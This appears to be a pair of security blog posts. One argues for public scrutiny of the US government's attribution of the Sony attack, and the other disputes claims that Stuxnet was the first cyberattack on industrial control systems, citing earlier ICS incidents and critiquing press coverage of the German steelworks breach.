British Prime Minister Margaret Thatcher famously once quipped “Standing in the middle of the road is very dangerous; you get knocked down by the traffic from both sides.” Some might take this to mean it is smarter to go with the flow. As Lee highlighted, they say pick a side either for trust in government or against. Actually, it often turns out to be smarter to reject this analogy.

Imagine flying a plane. Which “side” do you fly on when you see other planes flying in no particular direction? Thatcher was renowned for false choice risk-management, a road with only two directions where everyone chooses sides without exceptions. She was adamantly opposed to Gorbachev tearing down the wall, for example, because it did not fit her over-simplified risk management theory. Verification of safety is so primitive in her analogy as to be worthless to real-world management.

Asking for verification should be a celebration of government and trust. We trust our government so much, we do not fear to question its authority. Auditors, for example, look for errors or inconsistencies in companies without being seen as a threat to trust in those companies. Executives further strengthen trust through skepticism and inquiry.

Consider for a moment an APT (really, no pun intended) study called “Decisive action: How businesses make decisions and how they could do it better“. It asked “when taking a decision, if the available data contradicted your gut feeling, what would you do?”

APT-doubt

Releasing incomplete data could be reasonably expected to have 90% push back for more data or more analysis, according to this study. Those listening to the FBI claim North Korea is responsible probably have a gut feeling contradicting the data. That gut feeling is more “are we supposed to accept incomplete data as proof of something, because been there done that, let’s keep going” than it is “we do not trust you”.

In the same study 38% said decisions are better when more people are involved, and 38% said more people did not help, so quantity alone isn’t the route to better outcomes. Quality remains a factor, so there has to be a reasonable bar to input, as we have found in Big Data environments. The remaining 25% in the survey could tip the scale on this point, yet they said they were still collecting and reanalyzing data.

My argument here is you can trust and you still can verify. In fact, you should verify where you want to maintain or enhance trust in leadership. Experts definitely should not be blandly labelled as anti-government (the 3% who ignore) when they ask for more data or do reanalysis (the 90% who want to improve decision-making).

Perhaps Mitch Hedberg put it best:

I bought a doughnut and they gave me a receipt for the doughnut. I don’t need a receipt for a doughnut. I just give you the money, you give me the doughnut. End of transaction. We don’t need to bring ink and paper into this. I just can not imagine a scenario where I had to prove I bought a doughnut. Some skeptical friend. Don’t even act like I didn’t get that doughnut. I got the documentation right here. Oh, wait it’s back home in the file. Under D.

We have many doughnut scenarios with government. Decisions are easy. Pick a doughnut, eat it. At least 10% of the time we may even eat a doughnut when our gut instinct says do not because impact seems manageable. The Sony cyberattack however is complicated with potentially huge/unkown impact and where people SHOULD imagine a scenario requiring proof. It’s more likely in the 90% range where an expert simply going along with it would be exhibiting poor leadership skills.

So debate actually boils down to this: should the governed be able to call for accountability from their government without being accused of complete lack of trust? Or perhaps more broadly should the governed have the means to immediately help improve accuracy and accountability of their government, provide additional resources and skills to make their government more effective?

Agile and Social/Pair Development Methods

In the commercial world we have seen a massive shift in IT management from waterfall and staged progress (e.g. environments with rigorously separated development, test, ready, release, production) to developers frequently running operations. Security in operations has had to keep up and in some cases lead the evolution.

Given the context above, where embracing feedback-loops leads to better outcomes, isn’t government also facing the same evolutionary path? The answer seems obvious. Yes, of course government should be inviting criticism and be prepared to adapt and answer, moving development closer to operations. Criticisms could even be more manageable by nature of a process where they occur more frequently in response to smaller updates.

Back to Lee’s post, however, he suggests an incremental or shared analysis would be a path to disaster.

The government knew when it released technical evidence surrounding the attack that what it was presenting was not enough. The evidence presented so far has been lackluster at best, and by its own admission, there was additional information used to arrive at the conclusion that North Korea was responsible, that it decided to withhold. Indeed, the NSA has now acknowledged helping the FBI with its investigation, though it still unclear what exactly the nature of that help was.

But in presenting inconclusive evidence to the public to justify the attribution, the government opened the door to cross-analysis that would obviously not reach the same conclusion it had reached. It was likely done with good intention, but came off to the security community as incompetence, with a bit of pandering.

[…]

Being open with evidence does have serious consequences. But being entirely closed with evidence is a problem, too. The worst path is the middle ground though.

Lee shows us a choice based on false pretense of two sides and a middle full of risk. Put this in context of IT. Take responsibility for all the flaws and you delay code forever. Give away all responsibility for flaws and your customers go somewhere else. So you choose a reasonable release schedule that has removed major flaws while inviting feedback to iterate and improve before next release. We see software continuously shifting towards the more agile model, away from internal secret waterfalls.

Lee gives his ultimate example of danger.

This opens up scary possibilities. If Iran had reacted the same way when it’s nuclear facility was hit with the Stuxnet malware we likely would have all critiqued it. The global community would have not accepted “we did analysis but it’s classified so now we’re going to employ countermeasures” as an answer. If the attribution was wrong and there was an actual countermeasure or response to the attack then the lack of public analysis could have led to incorrect and drastic consequences. But with the precedent now set—what happens next time? In a hypothetical scenario, China, Russia, or Iran would be justified to claim that an attack against their private industry was the work of a nation-state, say that the evidence is classified, and then employ legal countermeasures. This could be used inappropriately for political posturing and goals.

Frankly this sounds NOT scary to me. It sounds par for the course in international relations. The 1953 US decision to destroy Iran’s government at the behest of UK oil investors was the scary and ill-conceived reality, as I explained in my Stuxnet talk.

One thing I repeatedly see Americans fail to realize is that the world looks in at America playing a position of strength unlike others, jumping into “incorrect and drastic consequences”. Internationally the one believed most likely to leap without support tends to be the one who perceives they have the most power, using an internal compass instead of true north.

What really is happening is those in American government, especially those in the intelligence and military communities, are trying to make sense of how to achieve a position of power for cyber conflict. Intelligence agencies seek to accumulate the most information, while those in the military contemplate definitions of winning. The two are not necessarily in alignment since some definitions of winning can have a negative impact on the ability to gather information. And so a power struggle is unfolding with test scenarios indispensable to those wanting to establish precedent and indicators.

This is why moving towards a more agile model, away from internal secret waterfalls, is a smart path. The government should be opening up to feedback, engaging the public and skeptics to find definitions in unfamiliar space. Collecting and analyzing data are becoming essential skills in IT because they are the future of navigating a world without easy Thatcher-ish “sides” defined. Lee concludes with the opposite view, which again presents binary options.

The government in the future needs to pick one path and stick to it. It either needs to realize that attribution in a case like this is important enough to risk disclosing sources and methods or it needs to realize that the sources and methods are more important and withhold attribution entirely or present it without any evidence. Trying to do both results in losses all around.

Or trying to do both could help drive a government out of the dark ages of decision-making tools. Remember the inability of a certain French General to listen to the skeptics all around him saying German invasion through the forest was imminent? Remember how that same General refused to use radio for regular updates, sticking to a plan, unlike his adversaries on their way to overtake his territory with quickly shifting paths and dynamic plans?

Bureaucracy and inefficiency leads to strange overconfidence and comfort in “sides” rather than opening up to unfamiliar agile and adaptive thinking. We should not confuse the convenience in getting everyone pointed in the same direction with true preparation and skills to avoid unnecessary losses.

The government should evolve away from tendencies to force complex scenarios into false binary choices, especially where social and pairing methods makes analysis easily improved. In the future, the best leaders will evaluate the most paths and use reliable methods to gradually reevaluate and adjust based on enhanced feedback. They will not “pick one path and stick to it” because situational awareness is more powerful and can even be more consistent with values (maintaining moral high-ground by correcting errors rather than doubling-down).

I’ve managed to avoid making any reference to football. Yet at the end of the day isn’t this all really about an American ideal of industrialization? Run a play. Evaluate. Run another play. Evaluate. America is entering a world of cyber more like soccer (the real football) that is far more fluid and dynamic. Baseball has the same problem. Even basketball has shades of industrialization with machine-like plays. A highly-structured top-down competitive system that America was built upon and that it has used for conflict dominance is facing a new game with new rules that requires more adaptability; intelligence unlocked from set paths.

Update 24 Jan: Added more original text of first quote for better context per comment by Robert Lee below.

Posted in History, Security.


Was Stuxnet the “First”?

My 2011 presentation on Stuxnet was meant to highlight a few basic concepts. Here are two:

  • Sophisticated attacks are ones we are unable to explain clearly. Spoons are sophisticated to babies. Spoons are not sophisticated to long-time chopstick users. It is a relative measure, not an absolute one. As we increase our ability to explain and use things they become less sophisticated to us. Saying something is sophisticated really is to communicate that we do not understand it, although that may be our own fault.
  • Original attacks are ones we have not seen before. It also is a relative measure, not an absolute one. As we spend more time researching and observing things, fewer things will be seen as original. In fact with just a little bit of digging it becomes hard to find something completely original rather than evolutionary or incremental. Saying something is original therefore is to say we have not seen anything like it before, although that may be our own fault.

Relativity is the key here. Ask yourself if there is someone to easily discuss attacks with to make them less sophisticated and less original. Is there a way to be less in awe and more understanding? It’s easy to say “oooh, spoon” and it should not be that much harder to ask “anyone seen this thing before?”

Here’s a simple thought exercise:

Given that we know critical infrastructure is extremely poorly defended. Given that we know control systems are by design simple. Would an attack designed for simple systems behind simple security therefore be sophisticated? My argument is usually no, that by design the technical aspects of compromise tend to be a low-bar…perhaps especially in Iran.

Since the late 1990s I have been doing assessments inside utilities and I have not yet found one hard to compromise. However, there still is a sophisticated part, where research and skills definitely are required. Knowing exactly how to make an ongoing attack invisible and getting the attack specific to a very intended result, that is a level above getting in and grabbing data or even causing harm.

An even more advanced attack makes trace/tracks of attack invisible. So there definitely are ways to bring sophistication and uniqueness level up substantially from “oooh, spoon” to “I have no idea if that was me that just did that”. I believe this has become known as the Mossad-level attack, at which point defense is not about technology.

I thought with my 2011 presentation I could show how a little analysis makes major portions of Stuxnet less sophisticated and less original; certainly it was not the first of its kind and it is arguable how targeted it was as it spread.

The most sophisticated aspects to me were in that it was moving through many actors across boundaries (e.g. Germany, Iran, Pakistan, Israel, US, Russia) requiring knowledge inside areas not easily accessed or learned. Ok, let’s face it. It turns out that thinking was on the right path, albeit an important role was backwards and I wasn’t sure where it would lead.

A US ex-intel expert mentioned on Twitter during my talk I had “conveniently” ignored motives. This is easy for me to explain: I focus on consequences as motive is basically impossible to know. However, as a clue that comment was helpful. I wasn’t thinking hard enough about the economic-espionage aspect that US intelligence agencies have revealed as a motivator. Recent revelations suggest the US was angry at Germany allowing technology into Iran. I had mistakenly thought Germany would have been working with the US, or Israel would have been able to pressure Germany. Nope.

Alas a simple flip of Germany’s role (critical to good analysis and unfortunately overlooked by me) makes far more sense because they (less often but similar to France) stand accused of illicit sales of dangerous technology to US (and friend of US) enemies. It also fits with accusations I have heard from US ex-intel expert that someone (i.e. Atomstroyexport) tipped-off the Germans, an “unheard of” first responder to research and report Stuxnet. The news cycles actually exposed Germany’s ties to Iran and potentially changed how the public would link similar or follow-up action.

But this post isn’t about the interesting social science aspects driving a geopolitical technology fight (between Germany/Russia and Israel/US over Iran’s nuclear program), it’s about my failure to make an impression enough to add perspective. So I will try again here. I want to address an odd tendency of people to continue to report Stuxnet as the first ever breach of its type. This is what the BSI said in their February 2011 Cyber Security Strategy for Germany (page 3):

Experience with the Stuxnet virus shows that important industrial infrastructures are no longer exempted from targeted IT attacks.

No longer exempted? Targeted attacks go back a long way as anyone familiar with the NIST report on the 2000 Maroochy breach should be aware.

NIST has established an Industrial Control System (ICS) Security Project to improve the security of public and private sector ICS. NIST SP 800-53 revision 2, December 2007, Recommended Security Controls for Federal Information Systems, provides implementing guidance and detail in the context of two mandatory Federal Information Processing Standards (FIPS) that apply to all federal information and information systems, including ICSs.

Note an important caveat in the NIST report:

…”Lessons Learned From the Maroochy Water Breach” refer to a non-public analytic report by the civil engineer in charge of the water supply and sewage systems…during time of the breach…

These non-public analytic reports are where most breach discussions take place. Nonetheless, there never was any exemption and there are public examples of ICS compromise and damage. NIST gives Maroochy from 2000. Here are a few more ICS attacks to consider and research:

  • 1992 Portland/Oroville – Widespread SCADA Compromise, Including BLM Systems Managing Dams for Northern California
  • 1992 Chevron – Refinery Emergency Alert System Disabled
  • 1994 Salt River – Water Canal Controls Compromised
  • 1999 Gazprom – Gas Flow Switchboard Compromised
  • 2001 California – Power Distribution Center Compromised
  • 2003 Davis-Besse – Nuclear Safety Parameter Display Systems Offline
  • 2003 Amundsen-Scott – South Pole Station Life Support System Compromised
  • 2003 CSX Corporation – Train Signaling Shutdown
  • 2006 Browns Ferry – Nuclear Reactor Recirculation Pump Failure
  • 2007 Idaho Nuclear Technology & Engineering Complex (INTEC) – Turbine Failure
  • 2009 Carrell Clinic – Hospital HVAC Compromised
  • 2013 Austria/Germany – Power Grid Control Network Shutdown

Fast forward to December 2014 and a new breach case inside Germany comes out via the latest BSI report. It involves ICS so the usual industry characters start discussing it.

Immediately I tweet for people to take in the long-view, the grounded-view, on German BSI reports.

Alas, my presentation in 2011 with a history of breaches and my recent tweets clearly failed to sway, so I am here blogging again. I offer as example of my failure the following headlines that really emphasize a “second time ever” event.

That list of four in the last article is interesting. Sets it apart from the other two headlines, yet it also claims “and only the second confirmed digital attack”? That’s clearly a false statement.

Anyway Wired appears to have crafted their story in a strangely similar fashion to another site; perhaps too similar to a Dragos Security blog post a month earlier (same day as the BSI tweets above).

This is only the second time a reliable source has publicly confirmed physical damage to control systems as the result of a cyber-attack. The first instance, the malware Stuxnet, caused damage to nearly 3,000 centrifuges in the Natanz facility in Iran. Stories of damage in other facilities have appeared over the years but mostly based on tightly held rumors in the Industrial Control Systems (ICS) community that have not been made public. Additionally there have been reports of companies operating in ICS being attacked, such as the Shamoon malware which destroyed upwards of 30,000 computers, but these intrusions did not make it into the control system environment or damage actual control systems. The only other two widely reported stories on physical damage were the Trans-Siberian-Pipeline in explosion in 1982 and the BTC Turkey pipeline explosion in 2008. It is worth noting that both stories have come under intense scrutiny and rely on single sources of information without technical analysis or reliable sources. Additionally, both stories have appeared during times where the reporting could have political motive instead of factuality which highlights a growing concern of accurate reporting on ICS attacks. The steelworks attack though is reported from the German government’s BSI who has both been capable and reliable in their reporting of events previously and have the access to technical data and first hand sources to validate the story.

Now here is someone who knows what they are talking about. Note the nuance and details in the Dragos text. So I realize my problem is with a Dragos post regurgitated a month later by Wired without attribution because look at how all the qualifiers disappeared in translation. Wired looks preposterous compared to this more thorough reporting.

The Dragos opening line is a great study in how to setup a series of qualifications before stepping through them with explanations:

This is only the second time a reliable source has publicly confirmed physical damage to control systems as the result of a cyber-attack

The phrase has more qualifications than Lance Armstrong:

  • Has to be a reliable source. Not sure who qualifies that.
  • Has to be publicly confirmed. Does this mean a government agency or the actual victim admitting breach?
  • Has to be physical damage to control systems. Why control systems themselves, not anything controlled by systems? Because ICS security blog writer.
  • Has to result from cyber-attack. They did not say malware so this is very broad.

Ok, Armstrong had more than four… Still, the Wired phrase by comparison uses dangerously loose adaptations and drops half. Wired wrote “This is only the second confirmed case in which a wholly digital attack caused physical destruction of equipment” and that’s it. Two qualifications instead of four.

So we easily can say Maroochy was a wholly digital attack that caused physical destruction of equipment. We reach the Wired bar without a problem. We’d be done already and Stuxnet proved to not be the first.

Dragos is harder. Maroochy also was from a reliable source, publicly confirmed resulting from packet-radio attack (arguably cyber). Only thing left here is physical damage to control systems to qualify. I think the Dragos bar is set oddly high to say the control systems themselves have to be damaged. Granted, ICS management will consider ICS damage differently than external harms; this is true in most industries, although you would expect it to be the opposite in ICS. To the vast majority, news of 800,000 released liters of sewage obviously qualifies as physical damage. So Maroochy would still qualify. Perhaps more to the point, the BSI report says the furnace was set to an unknown state, which caused breakdown. Maroochy had its controls manipulated to an unknown state, albeit not damaging the controls themselves.

If anyone is going to hang their hat on damage to control systems, the perhaps they should refer to it as an Aurora litmus, given the infamous DHS study of substations in 2007 (840pg PDF).

aurora

The concern with Aurora, if I understood the test correctly, was not to just manipulate the controls. It was to “exploit the capability of modern protective equipment and cause them to serve as a destructive weapon”. In other words, use the controls that were meant to prevent damage to cause widespread damage instead. Damage to just controls themselves without wider effect would be a premature end to a cyber-physical attack, albeit a warning.

I’d love to dig into that BTC Turkey pipeline explosion in 2008, since I worked on that case at the time. I agree with the Dragos blog it doesn’t qualify, however, so I have to move on. Before I do, there is an important lesson from 2008.

Suffice it to say I was on press calls and I gave clear and documented evidence to those interviewed about cyber attack on critical infrastructure. For example, the Georgia official complaint listed no damage related to cyber attack. The press instead ran a story, without doing any research, using hearsay that Russia knocked the Georgian infrastructure off-line with cyber attack. That often can be a problem with the press and perhaps that is why I am calling Wired out here for their lazy title.

Let’s look at another example, the 2007 TCAA, from a reliable source, publicly confirmed, causing damage to control systems, caused by cyber-attack:

Michael Keehn, 61, former electrical supervisor with Tehama Colusa Canal Authority (TCAA) in Willows, California, faces 10 years in prison on charges that he “intentionally caused damage without authorization to a protected computer,” according to Keehn’s November 15 indictment. He did this by installing unauthorized software on the TCAA’s Supervisory Control and Data Acquisition (SCADA) system, the indictment states.

Perfect example. Meets all four criteria. Sounds bad, right? Aha! Got you.

Unfortunately this incident turns out to be based only an indictment turned into a news story, repeated by others without independent research. Several reporters jumped on the indictment, created a story, and then moved on. Dan Goodin probably had the best perspective, at least introducing skepticism about the indictment. I put the example here not only to trick the reader, but also to highlight how seriously I take the question of “reliable source”.

Journalists often unintentionally muddy waters (pun not intended) and mislead; they can move on as soon as the story goes cold. What stake do they really have when spinning their headline? How much accountability do they hold? Meanwhile, those of us defending infrastructure (should) keep digging for truth in these matters, because we really need it for more than talking point, we need to improve our defenses.

I’ve read the court documents available and they indicate a misunderstanding about software developer copyright, which led to a legal fight, all of which has been dismissed. In fact the accused wrote a book afterwards called “Anatomy of a Criminal Indictment” about how to successfully defend yourself in court.

In 1989 he applied for a job with the Tehama-Colusa Canal Authority, a Joint Powers Authority who operated and maintained two United States Bureau of Reclamation canals. During his tenure there, he volunteered to undertake development of full automated control of the Tehama-Colusa Canal, a 110-mile canal capable of moving 2,000 cfs (cubic feet of water per second). It was out of this development for which he volunteered to undertake, that resulted in a criminal indictment under Title 18, Part I, Chapter 47, Section 1030 (Fraud and related activity in connection with computers). He would be under indictment for three years before the charges were dismissed. During these three years he was very proactive in his own defense and learned a lot that an individual not previously exposed would know about. The defense attorney was functioning as a public defender in this case, and yet, after three years the charges were dismissed under a motion of the prosecution.

One would think reporters would jump on the chance to highlight the dismissal, or promote the book. Sadly the only news I find is about the original indictment. And so we still find the indictment listed by information security references as an example of ICS attack, even though it was not. Again, props to Dragos blog for being skeptical about prior events. I still say, aside from Maroochy, we can prove Stuxnet not the first public case.

The danger in taking the wide-view is that it increases the need to understand far more details and do more deep research to avoid being misled. The benefit, as I pointed out at the start, is we significantly raise the bar for what is considered sophisticated or original attacks.

In my experience Stuxnet is a logical evolution, an application of accumulated methods within a context already well documented and warned about repeatedly. I believe putting it back in that context makes it more accessible to defenders. We need better definitions of physical damage and cyber, let alone reputable sources, before throwing around firsts and seconds.

Yes malware that deviates from normal can be caught, even unfamiliar malware, if we observe and respond quickly to abnormal behavior. Calling Stuxnet the “first” will perhaps garner more attention, which is good for eyeballs on headlines. However it also delays people from realizing how it fits a progression; is the adversary introducing never-seen-before tools and methods or are they just extremely well practiced with what we know?

The latest studies suggest how easy, almost trivial, it would be to detect Stuxnet for security analysts monitoring traffic as well as operations. Regardless of the 0day, the more elements of behavior monitored the higher the attacker has to scale. Companies like ThetaRay have been created on this exact premise, to automate and reduce the cost of the measures a security analyst would use to protect operations. (Already a crowded market)

That’s the way I presented it in 2011 and little has changed since then. Perhaps the most striking attempt to make Stuxnet stand out that I have heard lately was from ex-USAF staff; paraphrasing him, Stuxnet was meant to be to Iran what the atom bomb was to Japan. A weapon of mass-destruction to change the course of war and be apologized for later.

It would be interesting if I could find myself able to agree with that argument. I do not. But if I did agree, then perhaps I could point out in recent research, based on Japanese and Russian first-person reports, the USAF was wrong about Japan. Fear of nuclear assault, let alone mass casualties and destruction from the bombs, did not end the war with Japan; rather leadership gave up hope two days after the Soviets entered the Pacific Theater. And that should make you wonder really about people who say we should be thankful for the consequences of either malware or bombs.

But that is obviously a blog post for another day.

Please find below some references for further reading, which all put Stuxnet in broad context rather than being the “first”:

N. Carr, Development of a Tailored Methodology and Forensic Toolkit for Industrial Control Systems Incident Response, US Naval Postgraduate School 2014

A. Nicholson; S. Webber; S. Dyer; T. Patel; H. Janicke, SCADA security in the light of Cyber-Warfare 2012

C. Wueest, Targeted Attacks Against the Energy Sector, Symantec 2014

B. Miller; D. Rowe, A Survey of SCADA and Critical Infrastructure Incidents, SIGITE/RIIT 2012

Posted in Energy, History, Security.